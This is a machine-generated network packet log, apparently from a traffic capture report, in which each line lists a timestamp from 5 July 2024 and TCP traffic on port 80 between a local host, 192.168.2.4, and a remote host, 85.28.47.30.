                                                                Jul 5, 2024 04:23:18.016139984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016144991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016168118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016177893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016181946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016189098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016199112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016204119 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016215086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016215086 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016227961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016236067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016239882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016252995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016253948 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016283035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016307116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016469002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016484022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016494036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016505957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016518116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016519070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016529083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016556978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016594887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016607046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016617060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016628981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016633987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016640902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016654968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016693115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016792059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016803026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016812086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016822100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016838074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016859055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016885042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.032520056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032529116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032535076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032586098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032593012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.032597065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032608032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032625914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032638073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032644033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.032648087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.032659054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.032670975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.032696962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106437922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106460094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106470108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106534004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106616020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106626987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106637001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106647015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106657982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106698036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106709003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106729984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106740952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106750011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106759071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106769085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106770039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106779099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106790066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106796026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106801033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106816053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106822968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106827021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106839895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106862068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106863976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106873989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106905937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.106944084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106954098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106959105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106971979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106982946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.106993914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107007027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107022047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107089996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107100964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107114077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107124090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107132912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107139111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107144117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107155085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107157946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107165098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107176065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107178926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107187986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107192993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107217073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107239008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107378006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107388973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107398033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107410908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107414961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107422113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107425928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107434034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107441902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107469082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107666969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107676983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107686996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107697010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107707977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107714891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107718945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107728004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107732058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107743025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107745886 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107758045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107769012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107772112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107774973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107784986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107795000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107804060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107815027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107820988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107829094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107837915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107844114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107847929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107858896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107867956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107871056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107883930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107891083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107913971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107918024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107928991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107935905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107940912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107953072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.107963085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.107981920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108002901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108014107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108022928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108040094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108051062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108232021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108242989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108253002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108263969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108277082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108279943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108305931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108319998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108442068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108453035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108462095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108472109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108485937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108489990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108501911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108511925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108516932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108521938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108550072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108557940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108647108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108656883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108665943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108676910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108683109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108702898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108716011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108797073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108819962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108829021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108843088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108867884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.108962059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108973026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108982086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.108992100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109000921 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109004974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109025955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109045982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109118938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109128952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109138012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109148026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109154940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109164000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109188080 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109288931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109299898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109309912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109323025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109329939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109347105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109437943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109447956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109483004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109524965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109534979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109544039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109554052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109561920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109565973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109579086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109587908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.109589100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109612942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.109627008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.123621941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.123631954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.123637915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.123774052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.123774052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.123785973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.123797894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.123809099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.123836040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.123859882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201098919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201112986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201124907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201157093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201169014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201178074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201189995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201204062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201236963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201256037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201421022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201433897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201445103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201467037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201467991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201482058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201489925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201493979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201508045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201517105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201518059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201530933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201548100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201551914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201560020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201567888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201579094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201581955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201591015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201602936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201603889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201616049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201623917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201628923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201641083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201648951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201653957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201666117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201672077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201678038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201699018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201711893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201721907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201731920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201750040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201757908 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201762915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201777935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201783895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201792955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201806068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201807976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201823950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201826096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201862097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201872110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201881886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201891899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201901913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201913118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201927900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201932907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201946020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201953888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201957941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201972008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.201973915 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.201997042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202019930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202142954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202153921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202162981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202172995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202183008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202189922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202205896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202214003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202218056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202227116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202238083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202246904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202259064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202261925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202270985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202279091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202286959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202297926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202301979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202308893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202316999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202320099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202337027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202349901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202377081 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202533007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202586889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202610970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202621937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202630997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202642918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202652931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202657938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202681065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202696085 CEST4973280192.168.2.485.28.47.30
